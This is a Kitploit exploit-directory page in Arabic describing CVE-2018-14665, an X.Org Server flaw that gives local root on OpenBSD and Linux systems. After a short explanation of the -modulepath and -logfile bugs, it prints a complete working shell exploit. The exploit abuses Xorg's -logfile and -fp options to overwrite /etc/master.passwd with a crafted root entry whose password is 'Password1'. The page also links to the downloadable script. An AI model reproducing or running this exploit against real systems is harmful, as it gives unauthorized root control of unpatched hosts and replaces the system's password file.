Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-14665 — OpenBsd_CVE-2018-14665 | Kitploit
أدوات/GitHubGitHub/jas502n/cve-2018-14665
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubjas502n/cve-2018-14665

CVE-2018-14665

OpenBsd_CVE-2018-14665

عرض المستودع
177منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-14665

0x00 مقدمة

اكتشف باحث الأمن الهندي Narendra Shinde ثغرة أمنية عالية الخطورة (CVE-2018-14665) في حزمة X.Org Server تسمح لتحسين صلاحيات حساب عادي إلى الجذر، وقد أثرت على توزيعات لينكس الرئيسية بما في ذلك OpenBSD، Debian، Ubuntu، CentOS، Red Hat وFedora.

يوفر مشروع Xorg X تطبيقًا مفتوح المصدر لنظام X Window (أي X11، أو باختصار X، وهو نظام النوافذ للعرض النقطي. يوفر الإطار الأساسي لبيئة واجهة المستخدم الرسومية: رسم وتحريك النوافذ على أجهزة العرض والتفاعل باستخدام الماوس ولوحة المفاتيح.

وجد Shinde أن خادم Xorg X لا يعالج أو يتحقق بشكل صحيح من معاملات سطر الأوامر التالية على الأقل: -modulepath: يحدد مسار الدليل للبحث عن وحدات خادم Xorg، -logfile: يعين ملف سجل جديد لخادم Xorg بدلاً من استخدام السجل الافتراضي الموجود في /var/log/Xorg.n.log على معظم المنصات.

وفقًا لـ Narendra Shinde، يمكن للمستخدمين ذوي الصلاحيات المنخفضة استغلال ذلك لتنفيذ كود ضار والكتابة فوق أي ملف في النظام.

تم إدخال هذه الثغرة في حزمة خادم X.Org الإصدار 1.19.0 منذ أكثر من عامين.

أصدر Xorg إعلانًا أمنيًا بشأن ثغرة CVE-2018-14665.

root@kitploit:~
“当X服务器以提升的权限运行时(即,安装Xorg并设置setuid位并由非root用户启动)。”读取Xorg  建议。 

“-modulepath参数可用于指定要在X服务器中加载的模块的不安全路径,允许在特权进程中执行非特权代码。

由于在解析选项时检查不正确,-logfile参数可用于覆盖文件系统中的任意文件。“

0x01 الجذر

نشر خبير الأمن Matthew Hickey أيضًا كود استغلال (Proof of Concept) يسمح للمهاجم بالسيطرة على النظام الضعيف بثلاثة أوامر أو أقل.

يمكن تشغيل #0day LPE في OpenBSD من خلال CVE-2018-14665 عبر جلسة SSH عن بُعد، دون الحاجة إلى وحدة تحكم محلية. يمكن للمهاجم حرفيًا السيطرة على النظام المتأثر بثلاثة أوامر أو أقل.

نص الاستغلال: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

POC:

root@kitploit:~
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was 
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# 
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself 
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a 
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

ملاحظة: بعد النجاح، كلمة المرور الجديدة للجذر هي Password1، وسيتم نسخ ملف /etc/passwd الأصلي للنظام إلى /etc/master.passwd.old

0x02 روابط مرجعية

root@kitploit:~
https://twitter.com/hackerfantastic

https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

تنزيل الأداة